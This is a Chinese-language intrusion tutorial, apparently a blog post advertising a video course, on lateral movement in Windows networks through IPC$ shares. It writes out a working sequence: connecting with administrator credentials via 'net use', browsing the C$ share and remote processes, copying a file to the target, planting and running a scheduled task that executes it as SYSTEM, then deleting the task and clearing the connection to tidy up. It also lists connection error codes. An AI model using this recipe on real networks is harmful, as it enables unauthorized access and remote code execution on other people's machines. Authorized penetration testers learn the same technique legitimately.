IPC(Internet ProcessConnection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过ipc$,可以与目标机器建立连接。
利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
配套教程:内网渗透-IPC$横向控制OA系统【关注我,私信回复“资料”获取】
首先,需要建立一个ipc$
net use \\192.168.18.10\ipc$"密码" /user:administrator
net use
1、开启了139、445端口ipcs可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应用。通过139、445(Windows2000)端口,可以实现对共享文件打印机的访问。因此,一般来讲,ipcs需要139、445端口的支持。2、管理员开启了默认共享默认共享是为了方便管理员进行远程管理而默认开启 的,包括所有的逻辑盘(c、d、d、e等和系统目录winnt或windows(adminS)通过ipc等和系统目录winnt或windows(adminS)通过ipc,可以实现对这些默认共享目录的访问。
IPC$连接失败原因①用户名或密码错误②目标没有打开ipcs默认共享③不能成功连接目标的139、445端口
IPC$连接常见错误|
错误信息 |
原因 |
|
错误号5 |
拒绝访问 |
|
错误号51 |
Windows无法找到网络路径,即网络中存在问题 |
|
错误号53 |
找不到网络路径,包括IP地址错误、目标未开机、目标的lanmanserver服务未启动目标有防火墙(端口过滤) |
|
错误号67 |
找不到网络名,包括lanmanworkstation服务未启动、ipcs已被删除 |
|
错误号1219 |
提供的凭据与已存在的凭据集冲突。例如,已经和目标建立了ipcs,需要在删除原连接后重新进行连接 |
|
错误号1326 |
未知的用户名或错误的密码。 |
|
错误号l792 |
试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动(连接域控制器时会出现此情况) |
|
错误号2242 |
此用户的密码已经过期。例如,目标机器设置了账号管理策略,强制用户定期修改密码 |
在使用netuse命令与远程目标机器建立ipcs后,可以使用dir命令列出远程主机中的文件,如图
dir \\192.168.18.10\c$
在使用net use命令与远程目标机器建立ipcs后,可以使用tasklist命令的/S、/U/P参数列出远程主机上运行的进程
tasklist /s192.168.18.10
(1)查看系统时间
net time \\IP地址
(2)复制文件
copy 文件 \\IP地址\C$
(3)创建计划任务
schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件/ru system /f
(4)执行计划任务
schtasks /run /s IP地址 /i /tn "计划任务名"
(5)删除计划任务
schtasks /delete /s IP地址 /tn "计划任务名" /f
(6)清除IPC连接
net use \\IP /del /y
单看文字教程可能大部分小伙伴一脸懵,特奉上视频教程配套教程:内网渗透-IPC$横向控制OA系统【关注我,私信回复“资料”获取】
版权声明:xxxxxxxxx;
工作时间:8:00-18:00
客服电话
电子邮件
扫码二维码
获取最新动态
